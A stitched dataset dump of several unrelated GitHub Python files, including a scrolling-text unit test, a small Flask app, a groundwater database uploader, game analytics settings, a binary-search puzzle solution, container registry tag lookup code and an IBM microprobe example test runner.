self.assertTrue(self._current_text.startswith(\"test\"))\n\n # after 0.1 seconds, the text should have scrolled\n time.sleep(0.1)\n self.assertFalse(self._current_text.startswith(\"test\"))\n\n # during the pause, the text should not change\n scroll_text.pause()\n paused_text = self._current_text\n time.sleep(0.1)\n self.assertEqual(paused_text, self._current_text)\n\n # once resumed, the text should change again\n # and the text should be reset to initial\n scroll_text.resume()\n self.assertTrue(self._current_text.startswith(\"test\"))\n time.sleep(0.15)\n self.assertFalse(self._current_text.startswith(\"test\"))\n\n scroll_text.stop()\n print(\"... end test restart.\")\n\n def counting_callback(self, originator, value):\n #nanos = time.time_ns()\n nanos = time.time()\n self._text_counter.append((nanos, value))\n\n def count_text_function(self):\n return \"0123456789\"\n\n def test_count_and_time(self):\n \"\"\" This test mesures the time between the different updates of the text\n \"\"\"\n print(\"---------------------------\")\n print(\"Begining test count and time...\")\n scroll_text = ScrollingText(self.count_text_function, self.counting_callback,\n 5, refresh_rate=0, scroll_begin_delay=0.05,\n scroll_end_delay=0.07, scroll_rate=0.01)\n scroll_text.start()\n # The scroll text needs 0.2 = 0.05s + 5x0.01s + 0.07s to return to the beginning\n # So, it needs 0.27s to restart scrolling after the first cycle\n time.sleep(0.3)\n scroll_text.stop()\n\n # verify results\n full_text = self.count_text_function()\n self.assertGreaterEqual(len(self._text_counter), 7,\n \"The scrolling text should have changed at least 7 times.\")\n\n t0 = self._text_counter[0][0]\n text = self._text_counter[0][1]\n self.assertEqual(text, full_text[0:5], \"The initial text should be the first five characters of the text function\")\n\n # Check first iteration\n t1 = self._text_counter[1][0]\n delta1 = t1 - t0\n self.assertAlmostEqual(delta1, 0.05,\n msg=\"The first iteration is expecter after 0.05s\",\n delta=0.02)\n self.assertEqual(self._text_counter[1][1], full_text[1 : 6], \"The text of the first iteration is expected to be \\\"12345\\\"\")\n\n # check iteration from 2 to the end\n for i in range(2, 6):\n delta_n = self._text_counter[i][0] - self._text_counter[i - 1][0]\n text = self._text_counter[i][1]\n self.assertAlmostEqual(delta_n, 0.01, delta=0.002)\n self.assertEqual(text, full_text[i : i + 5])\n\n # check that the last iteration is longuer\n delta_last = self._text_counter[6][0] - self._text_counter[5][0]\n self.assertAlmostEqual(delta_last, 0.07, delta=0.02,\n msg=\"The last iteration should last 0.07s\")\n # Then, the new cycle begins\n delta_new = self._text_counter[7][0] - self._text_counter[6][0]\n self.assertAlmostEqual(delta_new, 0.05, delta=0.02)\n text_new = self._text_counter[6][1]\n self.assertEqual(text_new, full_text[0:5],\n msg=\"The scrolling text should start an new cycle after 7 iterations\")\n\n print(\"... end test restart.\")\n","repo_name":"sebastienroy/mamemasradio","sub_path":"python/test/test_scrollingtest.py","file_name":"test_scrollingtest.py","file_ext":"py","file_size_in_byte":6433,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"21499633358","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index_home():\n return render_template('index.html')\n\n@app.route('/test', methods=['GET'])\ndef index_test():\n if request.method == 'GET':\n print(\"GET!\")\n return render_template('index2.html')\n else:\n return \"

error

\"\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000, debug=True)","repo_name":"dimigoIOT/project","sub_path":"flaskr.py","file_name":"flaskr.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1656643968","text":"from cmath import isnan\n\nimport pandas as pd\n\n# import requests as requests\n\nfrom nmat.db import get_db_client\nfrom nmat.geo_utils import latlon_to_utm\nfrom nmat.query import execute_fetch, execute_insert, make_insert, make_select\nfrom nmat.util import message, warning, info, error\n\nCKAN_URL = \"https://catalog.newmexicowaterdata.org/\"\n\n\ndef add_records_to_db(client, wellid, pointid, group, dry=True, verbose=True):\n for i, row in group.iterrows():\n info(f\"Adding {i}, {row['PointID']} waterlevels to database\")\n\n keys = [\n \"WellID\",\n \"PointID\",\n \"DateMeasured\",\n \"DepthToWaterBGS\",\n \"MPHeight\",\n \"MeasuringAgency\",\n \"DataSource\",\n \"MeasurementMethod\",\n \"PublicRelease\",\n ]\n\n values = [\n str(wellid),\n pointid,\n row[\"Date\"].date(),\n row[\"DepthToWaterBGS\"],\n row[\"MPHeight\"],\n row[\"MeasuringAgency\"],\n row[\"DataSource\"],\n row[\"Method\"],\n int(row[\"PublicRelease\"].lower() == \"yes\"),\n ]\n\n sql = make_insert(\"WaterLevels\", keys)\n execute_insert(sql, values, client=client, dry=dry, verbose=verbose)\n\n\ndef add_well_to_db(client, row, pointid=None, dry=True, verbose=True):\n if pointid is None:\n result = get_last_point_id_like(client, \"BC-\", verbose=verbose)\n last_pointid = result[\"PointID\"]\n\n n = int(last_pointid.split(\"-\")[1])\n pointid = f\"BC-{n + 1:04n}\"\n\n keys = [\n \"PointID\",\n \"SiteNames\",\n \"Easting\",\n \"Northing\",\n \"Latitude\",\n \"Longitude\",\n \"CoordinateMethod\",\n \"Altitude\",\n \"AltitudeMethod\",\n \"AlternateSiteID\",\n \"SiteType\",\n \"DataReliability\",\n \"DateCreated\",\n \"County\",\n \"State\",\n ]\n lat, lon = row[\"Lat_DD\"], row[\"Long_DD\"]\n easting, northing = latlon_to_utm(lon, lat)\n\n values = [\n pointid,\n row[\"Site Name\"],\n easting,\n northing,\n lat,\n lon,\n row[\"CoordinateMethod\"],\n row[\"Altitude\"],\n row[\"Alt_Method\"],\n row[\"AlternateSiteID\"],\n row[\"SiteType\"],\n row[\"DataReliability\"],\n row[\"DateCreated\"],\n \"BERNALILLO\",\n \"NM\",\n ]\n\n sql = make_insert(\"Location\", keys)\n execute_insert(sql, values, client=client, dry=dry, verbose=verbose)\n\n result = get_location_id(client, pointid, verbose=verbose)\n if result is None:\n error(f\"Failed to get location id for {pointid}\")\n return\n location_id = str(result[\"LocationID\"])\n\n keys = [\"PointID\", \"LocationID\", \"ProjectName\"]\n for pn in (\"ProjectName1\", \"ProjectName2\"):\n values = [pointid, location_id, row[pn]]\n sql = make_insert(\"ProjectLocations\", keys)\n execute_insert(sql, values, client=client, dry=dry, verbose=verbose)\n\n keys = [\"LocationId\", \"PointID\", \"OSEWellID\", \"WellDepth\", \"WellPdf\"]\n values = [\n location_id,\n pointid,\n isnannone(row, \"OSEWellID\"),\n isnannone(row, \"WellDepth\"),\n isnannone(row, \"WellPdf\"),\n ]\n sql = make_insert(\"WellData\", keys)\n execute_insert(sql, values, client=client, dry=dry, verbose=verbose)\n\n return pointid\n\n\ndef isnannone(row, key):\n v = row[key]\n if isnan(v):\n return None\n return v\n\n\ndef get_location_id(client, pointid, verbose=True):\n sql = make_select(\n attributes=\"LocationID\", table=\"Location\", where=f\"PointID = '{pointid}'\"\n )\n return execute_fetch(sql, client=client, fetch=\"fetchone\", verbose=verbose)\n\n\ndef get_last_point_id_like(client, point_id, verbose=True):\n \"\"\"\n This function is used to get the last PointID from the database that is like point_id.\n :param point_id:\n :return:\n \"\"\"\n sql = make_select(where=f\"PointID LIKE '{point_id}%'\", order=f\"PointID DESC\")\n return execute_fetch(sql, client=client, fetch=\"fetchone\", verbose=verbose)\n\n\ndef get_point_id(client, point_id, verbose=True):\n \"\"\"\n This function is used to get the point_id from the database.\n :param point_id:\n :return:\n \"\"\"\n\n sql = make_select(\n attributes=\"PointID, WellID\", table=\"WellData\", where=f\"PointID = '{point_id}'\"\n )\n return execute_fetch(sql, client=client, fetch=\"fetchone\", verbose=verbose)\n\n\ndef get_latest_record(client, pointid, verbose=True):\n sql = make_select(\n table=\"WaterLevels\", where=f\"PointID = '{pointid}'\", order=\"DateMeasured DESC\"\n )\n return execute_fetch(sql, client=client, fetch=\"fetchone\", verbose=verbose)\n\n\ndef get_latest_data():\n resource_id = \"\"\n\n url = f\"{CKAN_URL}/datastore/dump/{resource_id}\"\n # resp = requests.get(url)\n # return resp.text\n\n\ndef upload_wells_from_file(p, sheetname, client=None, dry=True, verbose=False):\n message(f\"Uploading wells from {p}, sheet={sheetname}, dry={dry}\")\n if client is None:\n client = get_db_client()\n\n df = pd.read_excel(p, sheet_name=sheetname)\n for i, row in df.iterrows():\n add_well_to_db(client, row, pointid=row[\"PointID\"], dry=dry, verbose=verbose)\n\n\ndef upload_waterlevels_from_file(p, sheetname, client=None, dry=True, verbose=False):\n message(f\"Uploading waterlevels from {p}, sheet={sheetname}, dry={dry}\")\n\n if client is None:\n client = get_db_client()\n\n df = pd.read_excel(p, sheet_name=sheetname)\n\n # filter out any rows with Well_Name that starts with Z -\n print(df[\"Site_Name\"])\n filtered = df[~df[\"Site_Name\"].str.startswith(\"Z -\")]\n out = []\n # group df by Well_Name column\n grouped = filtered.groupby(\"Site_Name\")\n for i, (name, group) in enumerate(grouped):\n try:\n # check if in database\n repr_row = group.iloc[0]\n\n pointid = repr_row[\"PointID\"]\n if pointid and pointid != \"nan\":\n info(f\"Checking if {name}, ({pointid}) in database\")\n result = get_point_id(client, pointid, verbose=verbose)\n pointid, wellid = (\n (result[\"PointID\"], result[\"WellID\"]) if result else (None, None)\n )\n else:\n info(f\"no PointID provided. Assuming {name} not in database\")\n break\n\n if not pointid:\n # warning(f\"No PointID for {i}, {name}. skipping\")\n # continue\n pointid = add_well_to_db(client, repr_row, dry=dry, verbose=verbose)\n\n # else:\n\n # iterate over each row in the group\n # sort group by date\n group = group.sort_values(by=\"Date\")\n\n # get the latest record from the database\n dbrecord = get_latest_record(client, pointid, verbose=verbose)\n\n if dbrecord:\n print(\"asdf\", dbrecord[\"DateMeasured\"])\n # filter out all records that are older than the latest record in the database\n group = group[group[\"Date\"].dt.date > dbrecord[\"DateMeasured\"]]\n # print(group)\n # print(group['MSRMNT_Dat'].dt.date)\n\n # get well id for this pointid\n\n # add records to database\n add_records_to_db(client, wellid, pointid, group, dry=dry, verbose=verbose)\n out.append(pointid)\n except Exception as e:\n error(e)\n break\n\n # if i >1:\n # break\n\n with open(\"./nmat/output/addpoints.txt\", \"w\") as f:\n f.write(\"\\n\".join(out))\n\n\ndef main():\n client = get_db_client()\n\n get_latest_data()\n\n p = \"./indata/sp2023berncowls.xlsx\"\n sheetname = \"Sp2023BernCoWLs\"\n upload_waterlevels_from_file(p, sheetname, client=client)\n\n\nif __name__ == \"__main__\":\n main()\n\n# ============= EOF =============================================\n","repo_name":"DataIntegrationGroup/NMAquiferTool","sub_path":"nmat/bc_uploader.py","file_name":"bc_uploader.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14509490818","text":"# -*- coding: utf-8 -*-\nimport os\nfrom settings.base import *\n\nGNA_RETENTION_DAYS_LIST = [1,2,3,4,5,6,7,14,30,60,90]\n\n# web settings\nGNA_WEB_LIST_DAILY_LIMIT = 5\nGNA_WEB_LIST_MONTH_LIMIT = 1\nGNA_WEB_DETAIL_DAILY_LIMIT = 10\nGNA_WEB_DETAIL_MONTH_LIMIT = 12\n\nGNA_WEB_PAGINATOR_HEAD_LIMIT = 1\nGNA_WEB_PAGINATOR_TAIL_LIMIT = 1\nGNA_WEB_PAGINATOR_MID_LIMIT = 1\n\n##### tabulate settings #####\n\n# tabulate daily\nTABULATE_WEB_LIST_DAILY_DATE_LIMIT = 30\nTABULATE_WEB_LIST_DAILY_DATE_PLATFORM_LIMIT = 1000\nTABULATE_WEB_LIST_DAILY_PLATFORM_DATE_LIMIT = 30\nTABULATE_WEB_LIST_DAILY_DATE_CHANNEL_LIMIT = 1000\nTABULATE_WEB_LIST_DAILY_CHANNEL_DATE_LIMIT = 30\n\nTABULATE_FILTER_LC1_RATIO_GT = 0.38\nTABULATE_FILTER_LC2_RATIO_GT = 1\nTABULATE_FILTER_LC3_RATIO_GT = 0.26\nTABULATE_FILTER_LC4_RATIO_GT = 1\nTABULATE_FILTER_LC5_RATIO_GT = 1\nTABULATE_FILTER_LC6_RATIO_GT = 1\nTABULATE_FILTER_LC7_RATIO_GT = 0.18\nTABULATE_FILTER_LC14_RATIO_GT = 0.10\nTABULATE_FILTER_LC30_RATIO_GT = 0.05\nTABULATE_FILTER_VIP_RATIO_GT = 0.028\nTABULATE_FILTER_ARPPU_GT = 120\n\n# tabulate behave\nTABULATE_PURCHASE_ID_NAME = {1:'月卡',2:'小堆钻石',3:'小袋钻石',4:'大袋钻石',5:'小箱钻石',6:'大箱钻石',7:'钻石宝库'}\nTABULATE_RESOURCE_CHANNEL_ID_NAME = {\n 0: '活动赠送的礼品',\n 1: '体力',\n 2: '伙伴栏',\n 3: '仓库栏',\n 4: '竞技点',\n 5: '前线猎人竞技点',\n 6: '购买钻石',\n 7: '限时礼包',\n 1001: '初始化',\n 1002: '用户做成',\n 1003: '用户信息获取',\n 1005: 'ACTION_TYPE_GET_USER_DATA',\n 1006: '最新信息更新',\n 1007: '玩家信息获取',\n 1008: '新手引导信息更新',\n 1009: '脚本信息更新',\n 1010: 'ACTION_TYPE_NGWORD_CHECK',\n 1011: 'ACTION_TYPE_UPDATE_INFO_LIGHT',\n 1012: 'ACTION_TYPE_UPDATE_EVENT_INFO',\n 1090: '跳过tuto',\n 2004: 'ACTION_TYPE_SETTING_INFO',\n 2005: 'ACTION_TYPE_FRIEND_GET',\n 2006: '好友删除',\n 2008: '好友申请',\n 2009: 'ACTION_TYPE_FRIEND_GET_AGREE',\n 2010: '好友接受',\n 2011: '好友拒绝',\n 2013: '好友搜索',\n 2016: 'ACTION_TYPE_FRIEND_FAVORITE',\n 2030: 'ACTION_TYPE_LITTLE_GUILD_CREATE',\n 2031: 'ACTION_TYPE_LITTLE_GUILD_UPDATE',\n 2032: 'ACTION_TYPE_LITTLE_GUILD_REQUEST',\n 2033: 'ACTION_TYPE_LITTLE_GUILD_INVITE',\n 2034: 'ACTION_TYPE_LITTLE_GUILD_AGREE',\n 2035: 'ACTION_TYPE_LITTLE_GUILD_REFUSE',\n 2036: 'ACTION_TYPE_LITTLE_GUILD_DELETE',\n 2037: 'ACTION_TYPE_LITTLE_GUILD_QUIT',\n 2038: 'ACTION_TYPE_LITTLE_GUILD_SEARCH',\n 2039: 'ACTION_TYPE_LITTLE_GUILD_CANCEL',\n 2040: 'ACTION_TYPE_LITTLE_GUILD_AUTO_JOIN',\n 2101: '道具编成',\n 2102: '合成装备',\n 2103: '道具售出',\n 2104: '道具装备',\n 2201: 'ACTION_TYPE_TOWN_ENTER',\n 2202: '村庄产出',\n 2203: '村庄建筑升级',\n 2301: 'ACTION_TYPE_GET_GIFT_INFO',\n 2302: '礼包信息修正',\n 2401: '领取邀请特典',\n 2501: '接收钥匙',\n 2502: '使用钥匙',\n 2503: 'ACTION_TYPE_GET_DISTRIBUTE_DUNGEON_KEY_INFO',\n 2504: 'ACTION_TYPE_CONTROL_CENTER_ENTER',\n 2601: 'ACTION_TYPE_INNER_NOTICE_GET',\n 2701: 'ACTION_TYPE_DO_SLOTGAME',\n 3001: 'ACTION_TYPE_TEAM_EDIT',\n 3002: '强化英雄',\n 3003: '进化英雄',\n 3004: '出售卡片',\n 3005: '卡组编成',\n 3006: 'unit收藏',\n 3007: '试炼deck编辑',\n 3008: '获取试炼deck',\n 4002: '任务开始',\n 4003: '任务结束',\n 4004: '战斗复活',\n 4005: '任务重开',\n 4010: 'ACTION_TYPE_GET_CHLNG_MISSION_INFO',\n 4011: 'ACTION_TYPE_CHLNG_MISSION_START',\n 4012: 'ACTION_TYPE_CHLNG_MISSION_FRIEND_LIST',\n 4020: '获取前线猎人排期',\n 4021: 'ACTION_TYPE_FROHUN_START',\n 4022: '获取前线猎人关卡数据',\n 4023: 'ACTION_TYPE_FROHUN_MISSION_START',\n 4024: '前线猎人好友列表',\n 4025: '领取前线猎人排名奖励',\n 4101: '竞技场入场',\n 4102: 'ACTION_TYPE_ARENA_MATCHING',\n 4103: '竞技场对战开始',\n 4104: '竞技场奖励',\n 4105: '竞技场好友一览',\n 4106: '竞技场重启',\n 5001: '抽卡',\n 5003: 'gacha一览',\n 5102: '商店使用',\n 5103: '购买钻石',\n 5104: 'coin购买开始',\n 7101: '礼物一览获得',\n 7102: '礼物领取',\n 7201: '活动领取',\n 8001: 'ACTION_TYPE_MODEL_CHANGE_ID_ISSUE',\n 8002: 'ACTION_TYPE_MODEL_CHANGE_ID_CHECK',\n 8003: 'ACTION_TYPE_MODEL_CHANGE_END',\n 9999: 'debug',\n 10001: '无',\n 10002: '获取RAID副本世界信息',\n 10003: 'RAID副本中购买商品',\n 10004: 'ACTION_TYPE_RAID_UPDATE_SCENARIO_INFO',\n 10005: '获取副本当前状态的信息',\n 10006: '获取房间列表',\n 10007: '更新房间信息',\n 10008: '进入RAID副本房间',\n 10009: 'RAID副本选择副本',\n 10010: 'RAID副本选择好友信息',\n 10011: 'RAID副本获取好友信息',\n 10012: 'RAID副本进入房间内物品编辑',\n 10013: '更新用户副本是否准备状态的信息',\n 10014: '退出副本',\n 10015: '获取房间信息',\n 10016: '副本开始',\n 10017: 'RAID营地开始休息',\n 10018: 'RAID营地状态获取',\n 10019: 'RAID营地结束休息',\n 10020: '完成任务��获',\n 10021: 'RAID副本物品使用',\n 10022: 'ACTION_TYPE_RAID_LIMITED_ITEM_USE',\n 10023: 'ACTION_TYPE_RAID_ITEM_DELETE',\n 10024: 'RAID副本物品合成',\n 10025: 'RAID副本物品编辑',\n 10026: 'RAID副本房间任务退出',\n 10027: 'RAId副本任务完成',\n 10028: '获取Raid副本任务信息',\n 10029: '获取RAID副本简单的信息,开启时间,限时',\n 10030: 'RAID副本任务战斗开始',\n 10031: 'RAID副本任务战斗重新开始(死亡)',\n 10032: 'RAID副本任务战斗结束',\n 10033: '获取聊天记录',\n 10034: '发送聊天信息',\n 10035: '清除服务器缓存',\n 10036: '解散房间',\n 10037: '房间踢人',\n 10038: '获取RAID副本角色信息',\n 10039: '获取RAID副本角色奖杯信息',\n 11111: 'ACTION_TYPE_DAILY_TASK_MAIN',\n 11112: '完成每日任务',\n 11113: '活跃度宝箱打开',\n 11123: 'ACTION_TYPE_DAILY_STAMINA_MAIN',\n 11124: '每日体力获取',\n 11125: '获取每日任务信息',\n 14111: 'ACTION_TYPE_CHARGE_REWARD_MAIN',\n 14112: '索要任务奖励获取',\n 21112: 'ACTION_TYPE_BLACK_MARKET_MAIN',\n 21113: '黑市物品购买',\n 21114: '黑市刷新',\n 61125: 'ACTION_TYPE_DAILY_STAGE_MAIN',\n 81111: 'ACTION_TYPE_DOGGY_MAIN',\n 81112: 'ACTION_TYPE_DOGGY_MIX',\n}\nTABULATE_FACILITY_ID_NAME = {1:'宝玉屋',2:'调合屋',3:'村落升级',4:'音乐屋',5:'道具仓库'}\nTABULATE_LOCATION_ID_NAME = {1:'山',2:'川',3:'田',4:'森'}\nTABULATE_ARENA_CHALLENGE_RESULT_NAME = {0:'失败',1:'成功',2:'未完成'}\nTABULATE_DUNGEON_KEY_DO_TYPE_NAME = {1:'产出',2:'消耗'}\nTABULATE_BM_REFRESH_MONEY_TYPE_NAME = {1:'钻石'}\nTABULATE_BM_BUY_MONEY_TYPE_NAME = {1:'钻石',2:'金币'}\n\nTABULATE_DUNGEON_SLIVER_KEY_CODE = 1\nTABULATE_DUNGEON_GOLD_KEY_CODE = 2\n\n# tabulate monitor\nTABULATE_MONITOR_VIP_CHANNEL_ID_NAME = TABULATE_CHANNEL_NAME","repo_name":"sean2009/gm_web_analyze","sub_path":"settings/gna_settings.py","file_name":"gna_settings.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6709717509","text":"n, k, d = map(int, input().split())\nrules = [list(map(int, input().split())) for _ in range(k)]\n\nleft, right = 1, n\nwhile left <= right:\n mid = (left+right)//2 #도토리가 들어있는 마지막 상자 번호\n cnt = 0\n for rule in rules:\n start, end, gap = rule\n \n if mid < start: continue #마지막 상자가 start보다 앞쪽이면 안됨\n cnt += (min(end,mid)-start) // gap + 1\n\n if cnt >= d:\n right = mid - 1\n res = mid\n\n elif cnt < d:\n left = mid + 1\n\nprint(res)\n\n\n'''\n기존 아이디어\nimport sys\ninput = sys.stdin.readline\nn, k, d = map(int, input().split())\nboxes = []\nfor _ in range(k):\n start, end, gap = map(int, input().split())\n boxes.append(start)\n while True:\n start += gap\n if start <= end:\n boxes.append(start)\n else:\n break\n\nboxes.sort()\nres = 0\nleft, right = 0, n\n\nwhile left <= right:\n mid = (left+right)//2\n if mid+1 == d:\n res = boxes[mid]\n break\n elif mid+1 < d:\n mid = right + 1\n elif mid+1 > d:\n mid = left - 1\n\nprint(res)\n'''\n","repo_name":"hun-jae/189Python","sub_path":"week03/15732_도토리_숨기기/장윤아.py","file_name":"장윤아.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5239578705","text":"import json\nimport requests\nimport datetime\n\n\ndef get_current_image_tag(\n registry_prefix, project_id, image_name, password, user=\"_json_key\"\n):\n \"\"\"\n registry_prefix: the registry-FQDN like eu.gcr.io, gcr.io, docker.azure.XYZ, ...\n project_id: the project_id in GKE\n image_name: the name of the docker image\n password: password to access private registry. In the case of GCR, this is the json\n string containing the private-key for a service account.\n user (optional): username to access registry. In the case of GCR, this is \"_json_key\"\n \"\"\"\n # _json_key is used for Google Container Registry\n if user == \"_json_key\":\n url = \"https://{registry}/v2/{project}/{repo}/tags/list\".format(\n registry=registry_prefix, project=project_id, repo=image_name\n )\n response = requests.get(url, auth=(user, password))\n content = json.loads(response.text)\n time_stamp = 0\n latest_tag = \"\"\n for digest in content[\"manifest\"].items():\n if int(digest[1][\"timeUploadedMs\"]) > time_stamp:\n time_stamp = int(digest[1][\"timeUploadedMs\"])\n latest_tag = digest[1][\"tag\"]\n try:\n image_tag = latest_tag[0]\n except IndexError:\n print(\n \"Oops: No tags found for \"\n + registry_prefix\n + \"/\"\n + project_id\n + \"/\"\n + image_name\n )\n print(\"Please ensure at least one tag is pushed and try again\")\n exit(1)\n # Else if we're dealing with Azure CR\n elif \"azurecr.io\" in registry_prefix:\n url = \"https://{registry}/acr/v1/{repo}/_manifests\".format(\n registry=registry_prefix, repo=image_name\n )\n response = requests.get(url, auth=(user, password))\n content = json.loads(response.text)\n time_stamp = datetime.datetime.strptime(\"1970-01-01\", \"%Y-%m-%d\")\n latest_tag = \"\"\n for manifest in content[\"manifests\"]:\n manifest_timestamp = datetime.datetime.strptime(\n manifest[\"lastUpdateTime\"][:-3], \"%Y-%m-%dT%H:%M:%S.%f\"\n )\n if manifest_timestamp > time_stamp:\n try:\n latest_tag = manifest[\"tags\"][0]\n time_stamp = manifest_timestamp\n except KeyError:\n # Sometimes the manifest may not have any tags associated.\n continue\n if latest_tag == \"\":\n # We've scanned everything and found nothing\n print(\n \"No tags found in ACR. Please ensure at least one tag is pushed and try again\"\n )\n exit(1)\n image_tag = latest_tag\n # Future: Add additional registry logic\n else:\n print(\n \"Error: Cannot understand the registry used for latest image calculation. Please use ACR or GCR\"\n )\n exit(1)\n\n return image_tag\n","repo_name":"pradeepspak/Bumdlewrap","sub_path":"libs/docker_repo_functions.py","file_name":"docker_repo_functions.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40955434961","text":"from __future__ import absolute_import, print_function\n\n# Built-in modules\nimport ctypes\nimport os\nimport shutil\nimport signal\nimport time\nimport subprocess\nfrom tempfile import SpooledTemporaryFile, mkdtemp\nfrom unittest import TestCase, main, skipIf\n\n# Third party modules\n\n# Own modules\nimport microprobe\n\n\n__author__ = \"Ramon Bertran\"\n__copyright__ = \"Copyright 2011-2021 IBM Corporation\"\n__credits__ = []\n__license__ = \"IBM (c) 2011-2021 All rights reserved\"\n__version__ = \"0.5\"\n__maintainer__ = \"Ramon Bertran\"\n__email__ = \"rbertra@us.ibm.com\"\n__status__ = \"Development\" # \"Prototype\", \"Development\", or \"Production\"\n\n# Constants\nMP_TESTING_ARCH = os.environ.get(\"MP_TESTING_ARCH\", None)\nif MP_TESTING_ARCH is not None:\n if MP_TESTING_ARCH.startswith(\"POWER\"):\n MP_TESTING_ARCH = \"POWER\"\nBASEPATH = os.path.join(os.path.dirname(microprobe.__file__), \"..\", \"..\")\n_LIBC = ctypes.CDLL(\"libc.so.6\")\n\n\ndef _get_child_processes(parent_pid):\n ps_command = subprocess.Popen(\"ps -o pid --ppid %d --noheaders\" %\n parent_pid,\n shell=True,\n stdout=subprocess.PIPE)\n ps_output = ps_command.stdout.read()\n retcode = ps_command.wait()\n if retcode == 1:\n return []\n elif retcode == 0:\n if isinstance(ps_output, bytes):\n ps_output = ps_output.decode()\n pids = ps_output.split(\"\\n\")[:-1]\n for pid_str in ps_output.split(\"\\n\")[:-1]:\n pids += _get_child_processes(int(pid_str))\n return pids\n else:\n return []\n\n\ndef _kill_child_processes(parent_pid, sig=signal.SIGKILL):\n\n pids = _get_child_processes(parent_pid)\n\n for pid_str in pids:\n\n try:\n os.kill(int(pid_str), sig)\n except IOError:\n print(\"unable to kill: %s\" % pid_str)\n continue\n\n\ndef _set_pdeathsig(sig=signal.SIGKILL):\n\n def function():\n \"\"\"\n Kill process function\n \"\"\"\n return _LIBC.prctl(1, sig)\n\n return function\n\n\n# Classes\nclass power_example_suite(TestCase): # pylint: disable=invalid-name\n \"\"\"\n Power_example_suite Test Class.\n \"\"\"\n _multiprocess_can_split_ = True\n _multiprocess_shared_ = False\n\n name = \"power_example\"\n description = \"power example tests\"\n target = os.path.join(BASEPATH, \"targets\")\n trials = 3\n timeout = 20 # in seconds\n\n def _dir(self, arch='power'):\n return \"%s/targets/%s/examples/\" % (BASEPATH, arch)\n\n def setUp(self):\n tempdir = mkdtemp(prefix=\"microprobe_examples_%s_\" % self.name,\n suffix=\".example\")\n self.dirnames = [tempdir]\n\n def tearDown(self):\n for dirname in self.dirnames:\n shutil.rmtree(dirname)\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_001(self):\n \"\"\"\n power_example_suite: isa_power_v206_info.py\n \"\"\"\n self._wrapper([self._dir() + 'isa_power_v206_info.py'])\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_002(self):\n \"\"\"\n power_example_suite: power_v206_power7_ppc64_linux_gcc_profile.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_profile.py', '-p',\n '1', '-O', self.dirnames[0]\n ])\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_003(self):\n \"\"\"\n power_example_suite: power_v206_power7_ppc64_linux_gcc_fu_stress.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_fu_stress.py',\n '-O', self.dirnames[0]\n ])\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_004(self):\n \"\"\"\n power_example_suite: power_v206_power7_ppc64_linux_gcc_memory.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_memory.py',\n self.dirnames[0]\n ])\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_005(self):\n \"\"\"\n power_example_suite: power_v206_power7_ppc64_linux_gcc_random.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_random.py',\n self.dirnames[0]\n ])\n\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_006(self):\n \"\"\"\n power_example_suite: power_v206_power7_ppc64_linux_gcc_custom.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_custom.py',\n self.dirnames[0]\n ])\n\n @skipIf(True, \"Deprecated (removing PyEvolve)\")\n @skipIf(MP_TESTING_ARCH not in [None, \"POWER\"], \"Long testing\")\n def test_007(self):\n \"\"\"\n power_example_suite: power_v206_power7_ppc64_linux_gcc_genetic.py\n \"\"\"\n self._wrapper([\n self._dir() + 'power_v206_power7_ppc64_linux_gcc_genetic.py',\n self.dirnames[0],\n '%s/genetic_eval.sh' % self._dir('power')\n ])\n\n def _wrapper(self, commands):\n \"\"\"\n Common execution wrapper\n \"\"\"\n\n print(\" \".join(commands))\n\n for dummy_trial in range(0, self.trials):\n tfile = SpooledTemporaryFile()\n process = subprocess.Popen(commands,\n stdout=tfile,\n stderr=subprocess.STDOUT,\n preexec_fn=_set_pdeathsig(\n signal.SIGTERM))\n ctime = 0\n\n while ctime < self.timeout:\n\n error_code = process.poll()\n\n if error_code is None:\n time.sleep(0.1)\n ctime += 0.1\n else:\n break\n\n if error_code == 0:\n break\n elif error_code is None:\n try:\n _kill_child_processes(process.pid)\n process.kill()\n except OSError:\n # Maybe the process already finished\n pass\n error_code = 0\n break\n\n if error_code != 0:\n tfile.seek(0)\n print(tfile.read())\n\n self.assertEqual(error_code, 0)\n\n\nTEST_CLASSES = [power_example_suite]\n\nif __name__ == '__main__':\n main()\n","repo_name":"IBM/microprobe","sub_path":"targets/power/tests/examples/examples_power_tests.py","file_name":"examples_power_tests.py","file_ext":"py","file_size_in_byte":6460,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"77"} +{"seq_id":"3705073589","text":"import streamlit as st\nimport os\nfrom pathlib import Path\nfrom PIL import Image, ImageEnhance\nimport numpy as np\nimport cv2\nimport time\nimport pathlib\n\nst.set_page_config(page_title=None, page_icon=None, layout=\"wide\", initial_sidebar_state=\"auto\", menu_items=None)\ncwd = 